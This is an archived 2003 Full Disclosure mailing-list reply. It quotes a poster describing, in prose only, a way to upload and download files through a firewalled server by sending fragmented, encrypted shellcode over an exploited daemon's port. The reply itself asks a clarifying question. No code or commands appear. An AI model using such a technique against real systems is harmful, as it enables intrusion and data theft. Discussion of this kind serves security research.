Full Disclosure mailing list archives
Re: re: Global HIGH Security Risk
From: Jonathan Rickman <jonathan () xcorps net>
Date: Tue, 4 Feb 2003 09:13:25 -0500 (EST)
-----BEGIN PGP SIGNED MESSAGE----- On Tue, 4 Feb 2003, ^Shadown^ wrote:
Dear Folks, Thanks for your answers helpping me on how to post this information without getting in trouble. And to the ones that treat me as if I were stupid, all I have to say is that it was just simple. I don't know why it's not been documented, I've googled hard but couldn't find any thing about it. I've set up a server behind a fw (ipchains) without gcc, with a vulnerable daemon, the fw was set up just to allow the server to go through out by the binded daemon port only. What I did first was just to code an exploit for the vulnerable daemon and added a simple command sequence to write down to the server an uuencoded file using vi editor, then uudecode it and un-tar.gz and that way could upload binary files (which could be tools, sniffers, local exploits, etc). That way I could upload binary to execute on the remote server. But I've wanted to download files too (text and binaries) so I've coded a sniffer which listens for a specific ID-secuence to start/stop dumping to a file. And coded a tool to send the ID-secuence and the file to the sniffer. All this worked right. Then I removed all the programas that could be used as an text editor (joe, vim, cat, ed, etc), uudecode/uuencode, and compressing file tools. And I began to develop a technique which may be apply in any exploit code. It could be done many ways. Every coder is gonna do it it's own way, but I did it mine. I've coded an exploit with few options -f file_to_upload -s spawn_shell. The exploit sends diferent encrypted shellcodes depending the options. A shellcode sends and writes down to /tmp the file which firstly was fragmented by the exploit to be inserted into the multi shellcode sequence.(-f) The other is a standard shellcode. As simple as this, so you can upload and download any file type, and executed on the remote server. I think this explains the idea. I wish to post the PoC, but don't wanna get in trouble. Cheers, ^Shadown^
Again, I'm not trying to play the antagonist here, just asking a question. If what you're saying is, you placed a vulnerable service behind a packet filter that allowed inbound connections to the vulnerable service...well, duh. Of course you can run the exploit. I'm a bit confused by this statement "allow the server to go through out by the binded daemon port only" Are you saying that it's set up the way I described in the paragraph above? Once again, I'm not being critical...just trying to get through the language barrier. - -- Jonathan Rickman X Corps Security http://www.xcorps.net -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQEVAwUBPj/KjTTwrX0N9QH/AQGpqwf8DXpf+G/uGWIHQwITaiajAMk4y4XTt7+j jYto+KCNBexdyHKSiEz6BblH2sEOKcJHqreqTDxdMKL+KzkIt34SlFujza4OcS4b dFmq46PgHDrpEfaskjrKJnwwtwji8bJkU4N1stxei7f5WwyLMYXIZbhTJ6jl4Y9N YROfUDDw0WlgZ/5Qg9TAIwm26sKf5HDCr/9lTI6ZVp398omZOLtLXoLz7pNf24Er TL1/MdwX9cJ5LSzkmOm9PP51elRrNZfsPVwllLVJPnGkP5d/TuvnqYpjFeBSC3rs yPAeAejSO/Gr7YirkA+2TdLTew0xbA6LfBZNVWQsy/o5ewDtfZSZzg== =6jvh -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Global HIGH Security Risk, (continued)
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Message not available
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Message not available
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Re: Global HIGH Security Risk Jonathan Rickman (Feb 03)
- Re: Global HIGH Security Risk Benjamin Keller (Feb 03)
- Re: Global HIGH Security Risk Michael Renzmann (Feb 04)
- Re: Global HIGH Security Risk Benjamin Keller (Feb 03)
- RE: Global HIGH Security Risk bugtraq (Feb 03)
- Re: Global HIGH Security Risk David Howe (Feb 04)
- Global HIGH Security Risk phenethyl (Feb 03)
- re: Global HIGH Security Risk ^Shadown^ (Feb 03)
- Re: re: Global HIGH Security Risk David Howe (Feb 04)
- Re: re: Global HIGH Security Risk Jonathan Rickman (Feb 04)
- RE: Global HIGH Security Risk John . Airey (Feb 04)
- Re: Global HIGH Security Risk ^Shadown^ (Feb 06)
- RE: Global HIGH Security Risk Lance Fitz-Herbert (Feb 04)
- RE: Global HIGH Security Risk Jeroen Doorn (Feb 04)
- RE: Global HIGH Security Risk Jonathan Rickman (Feb 04)
- RE: Global HIGH Security Risk Melvyn Sopacua (Feb 04)
- Re: Global HIGH Security Risk Peter (Feb 04)
- RE: Global HIGH Security Risk Jonathan Rickman (Feb 04)